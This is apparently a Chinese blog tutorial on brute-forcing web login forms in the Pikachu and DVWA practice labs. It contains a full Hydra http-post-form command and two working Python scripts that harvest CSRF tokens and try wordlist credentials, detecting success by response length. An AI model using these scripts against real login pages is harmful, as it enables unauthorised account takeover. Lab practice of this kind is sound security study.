Hydra post登录框爆破

已于 2023-11-05 09:08:12 修改
阅读量736 收藏 4
点赞数
文章标签: web安全
于 2023-11-04 10:40:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wutiangui/article/details/134215389
版权

文章目录

无token时的Hydra post登录框爆破

登录一个无验证码和token的页面,同时抓包拦截
在这里插入图片描述

取出发送数据包:username=adb&password=133&submit=Login
将用户名和密码替换
username=USER&password=PASS&submit=Login
同时获取路径:/pikachu/vul/burteforce/bf_form.php
拼接发送数据后就是:
/pikachu/vul/burteforce/bf_form.php:username=USER&password=PASS&submit=Login
获取目标Ip:192.168.180.2
获取登录失败时的错误提示:username or password is not exists~
在这里插入图片描述

启动hydra开始爆破
hydra -L /home/kali/dic/acount.txt -P /home/kali/dic/mima.txt -V -f 192.168.180.2 http-post-form “/pikachu/vul/burteforce/bf_form.php:username=USER&password=PASS&submit=Login:username or password is not exists~”
-f表示找到一个马上停止
在这里插入图片描述

带Token时的Hydra post登录框爆破

首先准备一个带token的登录页面
在这里插入图片描述

抓包可以看到存在token
在这里插入图片描述

提取其中的POST路径:/dvwa/login.php
提取ip:192.168.180.2

然后准备一个python脚本,将路径和ip替换到相应位置,如下所示

# -*- coding: utf-8 -*-
import urllib
import requests
from bs4 import BeautifulSoup
##第一步,先访问 http://127.0.0.1/login.php页面,获得服务器返回的cookie和token
def get_cookie_token(ip, url):
    headers={'Host':ip,
             'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0',
             'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
             'Accept-Lanuage':'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
             'Connection':'keep-alive',
             'Upgrade-Insecure-Requests':'1'}
    res=requests.get(url,headers=headers)
    cookies=res.cookies
    a=[(';'.join(['='.join(item)for item in cookies.items()]))]   ## a为列表,存储cookie和token
    html=res.text
    soup=BeautifulSoup(html,"html.parser")
    token=soup.form.contents[3]['value']
    a.append(token)
    return a

##第二步模拟登陆
#ip 192.168.180.2
#url 'http://192.168.180.2/dvwa/login.php'
def Login(a,username,password, ip, url):    #a是包含了cookie和token的列表
    headers={'Host':ip,
             'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0',
             'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
             'Accept-Lanuage':'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
             'Connection':'keep-alive',
             'Content-Length':'88',
             'Content-Type':'application/x-www-form-urlencoded',
             'Upgrade-Insecure-Requests':'1',
             'Cookie':a[0],
             'Referer':url}
    values={'username':username,
            'password':password,
            'Login':'Login',
            'user_token':a[1]
        }
    data=urllib.parse.urlencode(values)
    resp=requests.post(url,data=data,headers=headers)
    return 
#重定向到index.php
def getacount(ip, url):
    with open("acount.txt",'r') as f:
        users=f.readlines()
        stop = False
        for user in users:
            if stop == True:
                break
            user=user.strip("\n")                 #用户名
            with open("mima.txt",'r') as file:
                passwds=file.readlines()
                for passwd in passwds:
                    passwd=passwd.strip("\n")   #密码
                    a=get_cookie_token(ip, url)              ##a列表中存储了服务器返回的cookie和toke
                    Login(a,user,passwd, ip, url)
                    headers={'Host':ip,
                              'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0',
                              'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
                              'Accept-Lanuage':'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
                              'Connection':'keep-alive',
                              'Upgrade-Insecure-Requests':'1',
                              'Cookie':a[0],
                              'Referer':url}
                    response=requests.get(url,headers=headers)
                    #print(len(response.text))
                    content_size = len(response.text)
                    if content_size != 1562:    #如果登录成功
                       print("用户名为:%s ,密码为:%s"%(user,passwd))   #打印出用户名和密码
                       stop = True
                       break
def main():
    ip = "192.168.180.2"
    url = "http://192.168.180.2/dvwa/login.php"
    getacount(ip, url)
if __name__=='__main__':
    main()

然后开启print(len(response.text))获取错误登录时的长度
在这里插入图片描述

可以看到错误时都是1523,将该值替换到 if content_size != 1523: #如果登录成功
同时注释print(len(response.text))
可以看到顺利爆破出了用户名密码
在这里插入图片描述
方法三(通用?)、

from bs4 import BeautifulSoup
import requests
from requests.models import Response

#url = "http://127.0.0.1:98/vul/burteforce/bf_token.php"
url = "http://127.0.0.1:81/login.php"
user_token = '8680761fe979039a6f836599906'
#proxies = {"http": "http://127.0.0.1:8080"}  # 代理设置,方便burp抓包查看和调试
header = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0',
    'Cookie': 'PHPSESSID=17u0i2fakm84eq9oc24boc8715'
}

def get_token(r):
    soup = BeautifulSoup(r.text, 'html.parser')
    #选择表单项的token
    #user_token = soup.select('input[name="token"]')[0]['value']
    user_token = soup.select('input[name="user_token"]')[0]['value']
    return user_token

if __name__ == "__main__":
    f = open('result.csv', 'w')     #把爆破结果储存到文件里,这里为csv格式
    f.write('用户名' + ',' + '密码' + ',' + '包长度' + '\n')    #给文件设置标题

    stop = False
    #遍历字典文件,Cluster bomb 暴力破解
    for admin in open("acount.txt"):
        if stop == True:
            break
        for line in open("mima.txt"):
            username = admin.strip()
            password = line.strip()
            payload = {     #payload为POST的数据
                #需有表单数据所有项目,如:username=adb&password=adfd&Login=Login&user_token=637b782363ffc7a618aea9a932c377ce
                'username': username,
                'password': password,
                #'token': user_token,
                'user_token': user_token,
                #'submit': 'Login'
                'Login': 'Login'
            }

            Response = requests.post(url, data=payload, headers=header)
            result = username + ',' + password + ',' + str(len(Response.text))  #用户名密码以及响应包长度

            print(len(Response.text))
            content_size = len(Response.text)
            #if content_size != 34090 and content_size != 34071:    #如果登录成功
            if content_size != 1562 and content_size != 1573:    #如果登录成功
                print("用户名为:%s ,密码为:%s"%(username,password))   #打印出用户名和密码
                #print(result)           #输出到终端
                stop = True
                break
            f.write(result + '\n')  #输出到文件
            user_token = get_token(Response)    #调用get_token函数获取下一次循环需要的token
    print('\n---完成---\n')
    f.close()
只为了拿0day
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
hydra使用指南
weixin_54150681的博客
12-01 2304
-R 恢复先前中止/崩溃的会话 -L 指定用户名字典 -S 执行SSL连接 -s 如果服务位于不同的默认端口上,请在此处定义它,指定非默认端口 -l 使用登录登录,或从文件加载多个登录名,指定破解的用户,对特定用户破解 -p 使用密码登录,或从文件加载多个密码 -P 指定密码字典 -x 密码暴力生成,键入“-x-h”获取帮助 -e 尝试“n”空密码,空密码试探,“s”登录通过and/or ,使用指定用户和密码试探“r”反向登录 -u 循环访问用户,而不是密码(有效!暗含-x) -...
Hydra爆破[无验证码]Web页面
lixiangminghate的专栏
02-16 1万+
Hydra是密码爆破神器,读者可以阅读这篇文章<Hydra – Brute Force Techniques>,了解Hydra支持的协议。其中,爆破Http登陆密码比爆破其他协议的密码更为复杂,本文将介绍如何爆破HTTP登陆页面的密码。HTTP有两种方式发送密码:Get Method和Post Method,后者比前者复杂,因此需要区别对待。 0.区分Get/Post类型的登陆页面 ...
Hydra post登录爆破(1)
最新发布
2401_84297035的博客
05-16 270
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。然后开启print(len(response.text))获取错误登录时的长度。
Hydra post登录爆破,2024年最新网络安全高级面试题pdf
wdsfgj的博客
04-15 293
可以看到错误时都是1523,将该值替换到 if content_size!获取登录失败时的错误提示:username or password is not exists~然后开启print(len(response.text))获取错误登录时的长度。然后准备一个python脚本,将路径和ip替换到相应位置,如下所示。同时注释print(len(response.text))提取其中的POST路径:/dvwa/login.php。首先准备一个带token的登录页面。可以看到顺利爆破出了用户名密码。
hydra使用教程
weixin_45778886的博客
03-14 3696
目录标题注意hydra详细使用教程hydra简介hydra常用命令hydra支持破解的服务/协议对应功能的参数模板1、破解ssh:2、破解ftp:3、get方式提交,破解web登录:4、post方式提交,破解web登录:5、破解https:6、破解teamspeak:7、破解cisco:8、破解smb:9、破解pop3:10、破解rdp:11、破解http-proxy:12、破解imap:实例演示-破解SSH密码1.使用字典对目标服务进行破解。2.当目标服务开放的端口不是默认端口时,使用 -s 进行指定。3
hydra详细使用教程
Sumarua的博客
07-26 1万+
文章目录hydra详细使用教程hydra简介hydra常用命令burpsuit进行破解。hydra支持破解的服务/协议对应功能的参数模板1、破解ssh:2、破解ftp:3、get方式提交,破解web登录:4、post方式提交,破解web登录:5、破解https:6、破解teamspeak:7、破解cisco:8、破解smb:9、破解pop3:10、破解rdp:11、破解http-proxy:12、破解imap:实例演示-破解SSH密码1.使用字典对目标服务进行破解。2.当目标服务开放的端口不是默认端口时,使
38.hack the box渗透之BurpSuite和Hydra密码爆破及Python加密Post请求(二)1
08-03
声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。写文章-CSDN
hydra密码爆破字典压缩后120M,password压缩前386M。
03-03
hydra密码爆破字典压缩后120M,压缩前386M。下的别人的,共享出来
hydra 爆破工具
02-22
windows 版 hydra 爆破工具,仅供学习。
hydra强大的爆破工具,支持多种协议
05-05
hydra支持POP3,SMB,RDP、SSH,FTP,POP3,Telnet,MYSQL等协议的爆破
ssh爆破工具hydra.zip
04-27
ssh爆破工具hydra.zip
密码爆破DOS运行_hydra-7.3-windows.7z
02-13
暴力猜解即是穷举法,穷举法的基本思想是根据题目的部分条件确定答案的大致范围,并在此范围内对所有可能的情况逐一验证,直到全部情况验证完毕。若某个情况验证符合题目的全部条件,则为本问题的一个解;...
穷举爆破神器hydra详细讲解和利用
maverickpig的博客
02-15 8905
hydra详细用法
Hydra post登录爆破,2024年最新来看看这份超全面的《网络安全面试题及解析》
2301_76225520的博客
04-13 352
获取登录失败时的错误提示:username or password is not exists~取出发送数据包:username=adb&password=133&submit=Login。同时获取路径:/pikachu/vul/burteforce/bf_form.php。然后准备一个python脚本,将路径和ip替换到相应位置,如下所示。提取其中的POST路径:/dvwa/login.php。登录一个无验证码和token的页面,同时抓包拦截。首先准备一个带token的登录页面。启动hydra开始爆破
[网络安全自学篇] 三十八.hack the box渗透之BurpSuite和Hydra密码爆破及Python加密Post请求(二)
热门推荐
杨秀璋的专栏
01-13 1万+
这是作者的系列网络安全自学教程,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文详细讲解了hack the box在线渗透平台获取邀请码、注册过程。本文将分享Web渗透三道入门题目,它们包括Python编写md5加密发送Post、万能密码和URL路径猜测、BurpSuite和Hydra密码爆破等。基础性文章,希望对您有所帮助!
pikachu 靶场通关(全)
weixin_45111459的博客
04-01 6868
发现同一个验证码我们重复使用了多次,返回的结果时用户名或密码错误,并没有提示验证码失效,也就是只要我们这个页面不刷新,就可以一直用这个验证码,那就跟第一关一样,直接ctrl+i拿去爆破,得到了跟上面一样的用户名跟密码。//union语句聚合两个查询的内容,由于页面只返回一行,所以在前面的输入一个不存在的id,我这里直接使-号,以返回我们输入的内容,这里页面上将1,2都返回了,得知两个字段都有回显, -- -的意思是注释掉后面的sql语句。
windows登录界面爆破试验---windows安全
lzj20060418的博客
05-07 356
4,可以看到已经爆出了Administrator用户的密码,那么就可以进行远程登陆了;2,确保windows靶机的远程服务开启了,这样才有爆破点,不然的话,毫无意义;1,首先创建一个密码字典;爆破时拥有一个庞大的字典是有必要的。这只是示例,可以使用kali自带的字典生成工具进行密码生成;5,利用kali自带的redesktop工具进行远程连接;3,使用hydra爆破工具进行爆破;6,将自己得到的用户和密码进行登录;成功进行了远程登录!渗透成功,试验结束!
【信息安全hydra爆破工具的使用方法
2302_79590880的博客
01-12 713
hydra又名九头蛇的使用方法
Hydra的基本使用
qq_46429177的博客
11-18 1387
-R 根据上一次进度继续破解 -S 使用SSL协议连接 -s 指定端口 -l 指定用户名 -L 指定用户名字典(文件) -p 指定密码破解 -P 指定密码字典(文件) -e 空密码探测和指定用户密码探测(ns) -C 用户名可以用:分割(username:password)可以代替-l username -p password -o 输出文件 -t 指定多线程数量,默认为16个线程 -vV 显示详细过程 使用案例: 使用hydra破解ssh的密码 hydra -L users.txt -P password
hydra爆破mysql
04-27
Hydra是一款常用的密码爆破工具,可以用于测试系统的密码强度。它支持多种协议和服务,包括MySQL数据库。下面是使用Hydra进行MySQL爆破的一般步骤: 1. 安装Hydra:首先需要在你的系统上安装Hydra。你可以从Hydra的官方网站或者其他可靠的资源中获取安装包,并按照指示进行安装。 2. 确定目标:确定你要进行爆破的MySQL服务器的IP地址和端口号。 3. 构建密码字典:准备一个密码字典文件,其中包含可能的密码组合。你可以使用常见的密码字典,也可以自己创建一个。 4. 运行Hydra:使用以下命令运行Hydra进行MySQL爆破: ``` hydra -L <用户名字典文件> -P <密码字典文件> <目标IP地址> mysql ``` 其中,`<用户名字典文件>`是包含可能的用户名列表的文件路径,`<密码字典文件>`是包含可能的密码列表的文件路径,`<目标IP地址>`是要爆破的MySQL服务器的IP地址。 5. 等待结果:Hydra将自动尝试使用用户名字典和密码字典中的组合进行爆破。等待Hydra完成爆破过程,它将输出成功找到的用户名和密码组合。 请注意,使用Hydra进行密码爆破是一种潜在的非法行为,除非你有合法的授权或者在合法的渗透测试环境中进行。在任何情况下,都要遵守法律和道德规范。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值